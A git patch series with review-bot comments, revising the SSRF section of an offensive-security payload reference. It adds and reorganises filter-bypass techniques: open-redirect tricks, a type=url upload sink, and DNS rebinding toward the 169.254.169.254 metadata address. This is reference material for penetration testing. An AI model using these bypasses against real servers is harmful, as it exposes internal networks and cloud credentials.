From 6d37ad9e2e8c9b7d84ffcbacb31ae88b59f70432 Mon Sep 17 00:00:00 2001 From: Alex Lauerman Date: Sun, 21 Jun 2020 16:19:15 -0500 Subject: [PATCH 1/3] Improved Clarity of ssrf redirect --- Server Side Request Forgery/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 19ba16e..161e267 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -79,11 +79,11 @@ http://localhost:443 http://localhost:22 ``` -Advanced exploit [using a redirection](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) +Advanced exploit [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) ```powershell -1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com -2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP +1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1) +2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 ``` From c39c904c9a6ff204f326072fb406eb0220563c66 Mon Sep 17 00:00:00 2001 From: Alex Lauerman Date: Sun, 21 Jun 2020 16:27:32 -0500 Subject: [PATCH 2/3] Moved bypasses under the bypasses section --- Server Side Request Forgery/README.md | 32 +++++++++++++-------------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 161e267..d130656 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md 
@@ -79,22 +79,6 @@ http://localhost:443 http://localhost:22 ``` -Advanced exploit [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) - -```powershell -1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1) -2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP -vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 -``` - -Advanced exploit using type=url - -```powershell -Change "type=file" to "type=url" -Paste URL in text field and hit enter -Using this vulnerability users can upload images from any image URL = trigger an SSRF -``` - ## Bypassing filters ### Bypass using HTTPS @@ -237,6 +221,22 @@ http://127.1.1.1:80#\@127.2.2.2:80/ ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) +### Bypassing using other tricks +[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) + +```powershell +1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1) +2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP +vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 +``` + +Using type=url + +```powershell +Change "type=file" to "type=url" +Paste URL in text field and hit enter +Using this vulnerability users can upload images from any image URL = trigger an SSRF +``` ## SSRF exploitation via URL Scheme From d5c1f39c0f61702bca90297929e26bc9b90318d8 Mon Sep 17 00:00:00 2001 
From: Alex Lauerman Date: Sun, 21 Jun 2020 16:31:16 -0500 Subject: [PATCH 3/3] Added DNS Rebinding --- Server Side Request Forgery/README.md | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index d130656..0b889ec 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -221,7 +221,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/ ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) -### Bypassing using other tricks +### Bypassing using a redirect [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) ```powershell @@ -230,7 +230,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/ vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 ``` -Using type=url +### Bypassing using type=url ```powershell Change "type=file" to "type=url" @@ -238,6 +238,14 @@ Paste URL in text field and hit enter Using this vulnerability users can upload images from any image URL = trigger an SSRF ``` +### Bypassing using DNS Rebinding (TOCTOU) + +```powershell +Create a domain that change between two IPs. http://1u.ms/ exists for this purpose. +For example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain: +make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms +``` + ## SSRF exploitation via URL Scheme ### File
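Review bot: In PATCH 1/3, hunk `@@ -79,11 +79,11 @@`, the rewritten step 1 no longer matches steps 2 and 3. Step 1 now says the redirecting page lives on "a whitelisted host", but step 2 still sends the SSRF to `http://YOUR_SERVER_IP` and the last line says `YOUR_SERVER_IP` performs the redirect; for the open-redirect bypass the PortSwigger link describes, the redirect has to come from a host the filter allows, not from the attacker's own IP. Step 1 also reads "redirects requests to the SSRF the target URL", which is garbled. Suggest something like `1. Find (or host) a page on a whitelisted domain that redirects to the internal target, e.g. http://192.168.0.1` and `2. Launch the SSRF: vulnerable.com/index.php?url=http://WHITELISTED_HOST/redirect`, with the closing line updated to say the whitelisted host issues the redirect. The old step 1 (a DNS A record pointing at 192.168.0.1) is a separate DNS-based bypass; if it is meant to be dropped rather than moved, a line in the commit message saying so would help.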
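Review bot: In PATCH 2/3, hunk `@@ -237,6 +221,22 @@`, the new `### Bypassing using other tricks` heading is followed directly by a bare link line `[using a redirect](...)` with no blank line and no sentence, and the heading itself says nothing about what the tricks are. Suggest giving the heading a descriptive name and turning the link into a sentence (`See PortSwigger: [bypassing SSRF filters via open redirection](...)`), separated from the heading by a blank line so it renders consistently with the other `###` sections in this file. Grouping the redirect trick and the `type=url` trick under one heading also hides that they are unrelated techniques; one subsection each would be clearer.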
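Review bot: In PATCH 3/3, hunk `@@ -221,7 +221,7 @@`, renaming the heading to `### Bypassing using a redirect` leaves the next line, `[using a redirect](https://portswigger.net/...)`, repeating the heading text almost verbatim. Suggest either folding the link into the heading or replacing the link line with a short sentence that states the precondition (a redirect on a host the filter allows), so the heading and the body do not say the same thing twice.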
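Review bot: In PATCH 3/3, hunk `@@ -230,7 +230,7 @@`, promoting `Using type=url` to `### Bypassing using type=url` labels something that is not a filter bypass. The block below it ("Change \"type=file\" to \"type=url\"", "upload images from any image URL = trigger an SSRF") describes finding an SSRF sink in an upload form, not getting past a URL filter, so under `## Bypassing filters` it is misleading. Suggest a heading such as `### SSRF via file upload with type=url` and placing it with the other exploitation vectors rather than under the bypass section.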
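Review bot: In PATCH 3/3, hunk `@@ -238,6 +238,14 @@`, the DNS rebinding block never says where the two lookups happen, so the `(TOCTOU)` in the heading is unexplained: the bypass only works when the application resolves the name once to validate it (getting 1.2.3.4 and passing the check) and resolves it again when it actually fetches (getting the internal address). Add a line stating that, and what the `-rr` suffix in `make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms` does, since the page does not explain it. Two smaller points: "a domain that change between two IPs" should read "a domain that changes between two IPs", and the prose "rotate between 1.2.3.4 and 169.254-169.254" should spell out the real target address (169.254.169.254) or say that the dashes are 1u.ms label notation, otherwise it reads as a typo.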